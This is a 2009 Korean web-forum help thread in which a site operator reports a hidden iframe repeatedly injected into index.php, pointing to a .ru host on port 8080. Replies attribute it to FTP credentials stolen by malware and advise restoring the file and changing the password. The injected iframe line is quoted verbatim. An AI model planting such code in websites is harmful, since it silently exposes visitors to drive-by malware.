묻고답하기
index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다.
2009.09.17 00:18
안녕하세요?
제목 그대로 index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다.
먼저 index.php 의 내용 가장 아래 쪽에 아래와 같은 소스가 저도 모르게 삽입된 것을 확인했습니다.
<div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=195 height=255 ></iframe></div>
이상하게 사이트 운영자인 제 컴퓨터에서는 정상적으로 접속이 되는데
다른 회원님들의 컴퓨터에서는 사이트 접속이 안 된다는 연락이 오더군요.
그래서 index.php 파일을 원본 파일로 교체하니 정상적인 접속이 되었습니다.
그런데 3일 연속으로 index.php 파일에 저 소스가 저절로 삽입이 되는군요.
이게 해킹되어서 그런 것인지 잘 모르겠습니다.
구글에서 저 소스를 검색해보니 2시간 전에 올라온 해외의 내용이 검색이 되더군요. 영어가 아니라서 해석은 못 했습니다.
http://www.r10.net/wordpress/459639-her-gun-iframe.html
일단 서버 회사에도 문의를 해볼 생각입니다만,
혹시 위 내용에 대해서 정보를 아시는 분이 계시다면 좀 알려주시면 고맙겠습니다. ^^
댓글 3
-
뉴클리어
2009.09.17 00:23
-
디따마니
2009.09.17 00:35
저도 그랬었는데 이유는 ftp 아이디/비번이 노출된겁니다.
ftp 아이디/비번 빼가는 악성코드에 걸린 컴퓨터에서 로그인한 순간 노출된 거지요.
수정된 파일 원래대로 복구하신 후
ftp 아이디/비번 바꾸세요
아래는 제가 올렸던 질문입니다. 참고하세요
-
RainSky
2009.09.17 00:47
먼저 위에 답변 남겨주신 분들에게 진심으로 감사의 말씀부터 전합니다.
위 질문을 남기고 나서 검색을 해보니 XE 팁 게시판에 자세한 내용이 올라와 있더군요.
http://www.xpressengine.com/18213404
조금 더 자세히 알아볼 필요가 있겠네요.
글쓴이 | 제목 | 최종 글 |
---|---|---|
XE | 공지 글 쓰기,삭제 운영방식 변경 공지 [16] | 2019.03.05 by 남기남 |
이제가을 | 메뉴위젯 3가지 추천부탁합니다. | |
토종매니아 | 확장변수에 대하여 [3] | 2009.09.17 by 깡왕 |
토종매니아 |
확장변수 (폼)
[1]
![]() | 2009.09.17 by 깡왕 |
뇌달 | xe내에 전체 태그목록을 출력해주는 페이지를 만들고 싶은데... [1] | 2009.09.17 by mc뷰 |
상22 |
content 위젯에 관한 질문입니다.
[1]
![]() | 2009.09.17 by mc뷰 |
고딩어 | cafeXE레이아웃에서 좌측 트리메뉴에 관한 질문 | |
쇼군57 |
관리자 페이지가 깨지는데 이유가 ??/
[1]
![]() | 2009.09.17 by 쇼군57 |
러블리창 |
게시판과 게시판 밑에 이미지사이에 생긴 빈공간을 없애는 방법좀 알려주세요!
[2]
![]() | 2009.09.17 by 러블리창 |
하늘384 | xe_v2 레이아웃 [2] | 2009.09.17 by 하늘384 |
워나트 | 페이지수정 [2] | 2009.09.17 by 워나트 |
xe훌륭해 | 상자위젯 센터 | |
쫄병강아지 |
(그림첨부)고수님들! css 포지션닝 관련질문입니다!
![]() | |
안재성 | 비밀번호 찾기 / 인증메일 메뉴 hanmail과 hotmail에서.. | |
마이콘 | 블로그와 사이트 연동방법? [1] | 2009.09.17 by NineTail |
김용춘 |
확장변수에서 checkbox 정렬이 세로가 아닌 가로로는 어케하나요?
![]() | |
xotksdl |
xe1.2.5 레이아웃 등록이 안됩니다. .
[1]
![]() | 2009.09.17 by xotksdl |
NZ448 |
1.2.5 글쓰기가 아예 안됩니다. 도와주세요
![]() | |
주인장_안씨 | ''웹주소/xe/home''로 할때 안되네요. [4] | 2009.09.17 by 주인장_안씨 |
RainSky | index.php 파일에 알 수 없는 소스가 저절로 삽입됩니다. [3] | 2009.09.17 by RainSky |
호시카라 | 로그인할때 특정 프레임을 새로고침시키고싶습니다. [1] | 2009.09.17 by 뉴클리어 |
안녕하세요.
저도 인터넷 막 뒤집다 보니까.
신종바이러스 아이프레임 이라네요.
~~~~.ru , cn 도메인의 8080에 Iframe 로되있으면 99.9997 % 입니다. ( 0.0003% 로 안그럴수만 있으면. )
바이러스 백신을 켜서 정밀검사를 해보세요.
이 외에는 ...